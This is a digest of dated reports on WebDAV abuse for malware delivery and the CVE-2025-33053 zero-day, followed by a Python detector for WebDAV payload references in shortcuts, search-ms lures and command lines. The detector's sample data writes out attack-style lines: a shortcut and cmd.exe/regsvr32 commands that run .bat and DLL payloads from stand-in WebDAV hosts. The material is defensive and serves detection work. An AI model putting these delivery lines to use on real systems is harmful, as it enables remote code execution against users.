• WebDAV malware: a digest of reporting on WebDAV abused for malware delivery and on the 2025 Windows WebDAV zero-day.

• Background · WebDAV stands for "Web Distributed Authoring and Versioning". It is a set of extensions to the HTTP protocol that allows users to access and edit files on a remote web server, defining how basic file functions such as copy, move, delete, and create are performed using HTTP (docs.microsoft.com). On Windows the WebClient service needs to be enabled for WebDAV-based programs and features to work, which is why delivery chains built on UNC paths to attacker-controlled WebDAV shares are described as WebClient abuse. WebDAV extends HTTP to facilitate remote content management, but improper implementation creates serious security vulnerabilities that attackers can exploit to compromise systems (Nov 26, 2024).

• Feb 24, 2023 · The .url and .bat files both use WebDAV to retrieve and run the malware.

• Sep 18, 2023 · Bill Toulas: the malware loader 'Bumblebee' has broken its two-month vacation with a new campaign that employs new distribution techniques that abuse 4shared WebDAV services.

• Apr 8, 2024 · ANY.RUN, the leading provider of an interactive malware analysis sandbox, published a study on cyber attacks that leverage WebDAV, URLs, and LNK files to deliver malware, looking at client-side exploitation techniques that abuse WebDAV and LNK files.

• Aug 29, 2024 · Proofpoint: learn how to defend yourself from the Voldemort malware campaign's espionage and protect yourself from Chinese spyware threats.

• Sep 19, 2024 · Detailed analysis of malware delivered via WebDAV: the use of WebDAV for malicious purposes, the range of malware distributed through this infrastructure, and the potential for this setup to be part of a broader "Infrastructure-as-a-Service" (IaaS) offering to cybercriminals. The analysis uncovered a wider range of malware distributed via this infrastructure than previously reported; the families identified, such as SelfAU3, DarkGate, and Amadey, demonstrate the infrastructure's versatility.

• Undated · The flowchart in the original write-up outlines the stages of an infection via the search-ms protocol, custom WebDAV servers and the delivery of first- and second-stage malware: MASEPIE, OCEANMAP and STEELHOOK respectively.

• Oct 30, 2024 · Threat Hunting Packages designed to detect suspicious remote WebDAV share access and file execution activities, such as those employed by the Strela Stealer malware, with rules to detect malicious URL/LNK files, command line indicators, and network connections to WebDAV servers.

• Jun 10, 2025 · Microsoft patched a zero-day flaw in WebDAV (reported Jun 25, 2025). This latest campaign highlights the ongoing threat posed by sophisticated APT groups, which combine zero-day exploits with innovative attack vectors, such as WebDAV manipulation, to target critical infrastructure and defense organizations worldwide.

• Jun 11, 2025 · Microsoft has fixed the CVE-2025-33053 vulnerability in Web Distributed Authoring and Versioning (WebDAV), which allowed attackers to remotely execute arbitrary code on a victim's computer. The flaw was being actively used by an APT group known as Stealth Falcon (also FruityArmor) in the Middle East, which exploited the Windows WebDAV RCE vulnerability in zero-day attacks since March 2025 against defense and government organizations in Turkey, Qatar, ... The SOC Prime blog carries a deeper analysis of the actively exploited flaw.

• Jun 12, 2025 · The Stealth Falcon exploitation of Windows WebDAV (CVE-2025-33053) underscores an unpleasant but inescapable reality of today's threat landscape: even trusted, built-in operating system utilities present avenues for remote, highly evasive compromise.

• Jun 13, 2025 · A critical zero-day vulnerability in WebDAV implementations that enables remote code execution, with proof-of-concept exploit code now publicly available on GitHub.
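The hunting rules mentioned above (malicious URL/LNK files, command line indicators, connections to WebDAV servers), the .url-plus-.bat delivery chain and the search-ms lure stage all reduce to one detection problem: spotting a reference to a remote WebDAV share that ends in something executable. The following is an added example written for this page, not code from ANY.RUN, any hunting package vendor or any of the reports cited. The `image|command line` record layout, the hostnames and the sample shortcut are constructed; the UNC spellings it matches (`\\host@80\...`, `\\host@SSL\DavWWWRoot\...`, `file://host@80/...`) are the forms Windows routes through the WebClient service.

```python
"""Flag WebDAV-based payload delivery in .url files, process command lines and search-ms lures.

Added example, not taken from any vendor's hunting package. Hostnames, the
'image|command line' record layout and all sample data below are constructed.
"""
import configparser
import re
from urllib.parse import unquote

# UNC spellings that Windows hands to the WebClient (WebDAV) redirector, e.g.
#   \\host@80\share\x   \\host@SSL\DavWWWRoot\x   \\host@SSL@443\x   \\host\DavWWWRoot\x
_UNC = re.compile(
    r"\\\\(?P<host>[A-Za-z0-9][A-Za-z0-9.\-]*)(?P<ports>(?:@(?:SSL|\d{1,5}))*)"
    r"[\\/](?P<path>[^\s\"'<>|&]*)",
    re.IGNORECASE,
)
# The same thing written as a URL, as found in the URL= line of an Internet Shortcut (.url).
_FILE_URL = re.compile(
    r"file:(?://+|\\\\)(?P<host>[A-Za-z0-9][A-Za-z0-9.\-]*)(?P<ports>(?:@(?:SSL|\d{1,5}))*)"
    r"[\\/](?P<path>[^\s\"'<>|&]*)",
    re.IGNORECASE,
)
_SEARCH_MS = re.compile(r"search-ms:(?P<query>[^\s\"']*)", re.IGNORECASE)
# Extensions that execute (or, for .lnk/.url, chain to something that does) when opened.
RISKY_EXT = (".lnk", ".url", ".bat", ".cmd", ".vbs", ".js", ".hta", ".exe", ".dll", ".msi", ".ps1")


def find_remote_refs(text):
    """Return one dict per remote UNC / file:// reference in text.

    webdav is True when the spelling forces the WebDAV redirector (an @port/@SSL
    suffix or a DavWWWRoot segment); a bare UNC path without those markers is
    still remote, but Windows tries SMB first and only falls back to WebDAV.
    """
    matches = list(_FILE_URL.finditer(text))
    matches += list(_UNC.finditer(_FILE_URL.sub(" ", text)))   # avoid double-counting file:\\host
    refs = []
    for m in matches:
        path = m["path"].replace("/", "\\")
        refs.append({
            "host": m["host"].lower(),
            "path": path,
            "webdav": bool(m["ports"]) or path.lower().startswith("davwwwroot"),
            "executable": path.lower().endswith(RISKY_EXT),
        })
    return refs


def search_ms_locations(text):
    """Remote locations a search-ms: URI would open in Explorer (its crumb=location:<path>)."""
    found = []
    for m in _SEARCH_MS.finditer(text):
        for param in unquote(m["query"]).split("&"):
            key, _, value = param.partition("=")
            if key.lower() == "crumb" and value.lower().startswith("location:"):
                found += find_remote_refs(value[len("location:"):])
    return found


def scan_url_file(content):
    """Parse an Internet Shortcut; return remote refs in its URL=, IconFile= and WorkingDirectory= values."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(content)
    hits = []
    for section in cp.sections():
        for key in ("url", "iconfile", "workingdirectory"):   # configparser lower-cases keys
            value = cp[section].get(key)
            if value:
                hits += find_remote_refs(value)
    return hits


def scan_command_lines(records):
    """Scan 'image|command line' records; return (image, host, path, reason) alerts."""
    alerts = []
    for record in records:
        image, _, cmd = record.partition("|")
        for r in search_ms_locations(cmd):
            alerts.append((image, r["host"], r["path"], "search-ms lure opens a remote share"))
        for r in find_remote_refs(cmd):
            if r["webdav"] and r["executable"]:
                alerts.append((image, r["host"], r["path"], "runs a payload from a WebDAV share"))
    return alerts


# Constructed samples (not real indicators).
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://files.example.net@80/share/invoice.bat
IconIndex=13
IconFile=C:\\Windows\\System32\\SHELL32.dll
"""
SAMPLE_LOG = [
    r"C:\Windows\explorer.exe|explorer.exe search-ms:query=report&crumb=location:\\files.example.net@SSL\DavWWWRoot\docs&displayname=Downloads",
    r"C:\Windows\System32\cmd.exe|cmd.exe /c \\files.example.net@80\share\update.bat",
    r"C:\Windows\System32\regsvr32.exe|regsvr32.exe /s \\10.0.0.5\DavWWWRoot\lib.dll",
    r"C:\Windows\System32\cmd.exe|cmd.exe /c type \\fileserver\public\notes.txt",  # plain SMB, not a payload
]

if __name__ == "__main__":
    for hit in scan_url_file(SAMPLE_URL_FILE):
        print("url file ->", hit)
    for alert in scan_command_lines(SAMPLE_LOG):
        print("alert ->", alert)
```

Run as-is it prints one hit for the shortcut and three alerts for the log (the search-ms lure, the .bat pulled over `@80`, the DLL loaded from `DavWWWRoot`), and nothing for the plain SMB text file. In practice `scan_command_lines` would be fed Sysmon event 1 or Security 4688 command lines and `scan_url_file` the shortcut files carved from mail attachments. Since every one of these paths only resolves when the WebClient service is running, that service's state is the matching host-level control.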